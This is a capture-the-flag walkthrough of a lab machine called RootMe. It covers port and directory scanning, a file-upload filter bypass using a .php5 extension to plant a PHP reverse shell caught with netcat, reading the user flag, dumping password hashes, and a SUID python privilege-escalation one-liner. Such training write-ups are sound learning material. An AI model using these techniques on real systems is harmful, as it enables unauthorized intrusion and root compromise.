RootMe

Task 1 - Deploy the machine

• Hit the Start Machine Button

Task 2 - Reconnaissance

Scan the machine, how many ports are open?

Run quick nmap scan:

nmap [Target IP]

• Looks like two typical ports are open. SSH and HTTP

What version of Apache is running?

Run version scan of nmap

nmap -sV -p 80 [Target IP]

• Looks like apache version 2.4.29 is running on the machine.

What service is running on port 22?

• SSH runs on port 22 typically.

Find directories on the web server using the GoBuster tool.

• Check out the URL from the provided IP address:

gobuster dir -u http://[Target IP] -w [Path to wordlist]

What is the hidden directory?

• The answer is /panel/

Task 3 - Getting a shell

• Most of the directories are of nothing to note.

  • However, the /panel directory and the /uploads directory both appear to be something good. The panel directory allows uploading files and the uploads directory allows us to view the files and probably more.

• 
• 
• I'll start by looking at the source code for both.

  • Nothing to note on the /uploads directory but the /panels directory only shows an upload form. Therefore, it is probably safe to assume that if there is any filtering taking place it is happening on the Server's side meaning it will have to be trial and error to gain access.

• Based on the gobuster scan it appears that the backend is most likely ran by php. You can tell this from the directory /index.php.

  • Checking wappalyzer did not show me this and only shows that the web sever is running off of Ubuntu and utilizes apache.

• Knowing that the input field most likely uses a php script, I took a chance and tried uploading a php reverse shell that I had.

  • Here is the link to the one I grabbed from GitHub: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

  • • It kicked back an error message in another language.

      • 
• If I change the file extension at the end to .php5 it will work. Meaning the server side is not filtering for other type of php file extensions.

  • 
• On another tab on my host machine I turned on a netcat listener:

nc -lvnp 4444

• I navigated over to the /uploads directory and clicked on the reverse_shell.php5.

• Jumping back to the netcat listener shows that I have a reverse shell to the user www-data.

• 
• It took me way too long to find the file users.txt and had to run the following to find it:

find / -name user.txt 2> /dev/null

• 

cat /var/www/user.txt

• I cat'd the file --> THM{y0u_g0t_a_sh3ll}

Task 4: Privilege Escalation

• root --> $6$5osB44J2$24WV3zAR1FTqEq3f2kSqrigUgyDmKucU8rwHvbOJWxIoWSlHbVHV1Ug1eOHqidieZWDU3Y5V3cimChun2JYNw1

• rootme --> $6$jzeDDmrVeqMMEQqv$j8jwWy951YwWBJWzQNn.A45I.8H06/QOv4qocX.hNDdT42NytyavSHxlxoEh0ek2OS4NX27tuuZRTJuHPSWCp

• test --> $6$vXOyvOWZ$UpIjnJq/KuKmKHezW/pEM.nrI6QuqhWWlv/fUmLvJI1YG7nju2vpP3vg1Q0SSf5FCk8058WD5Rc3XXPMRlqHb0

• Privelege Escalation -->

python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

• Looking for SUID -->

find / -type f -perm -04000 -ls 2>/dev/null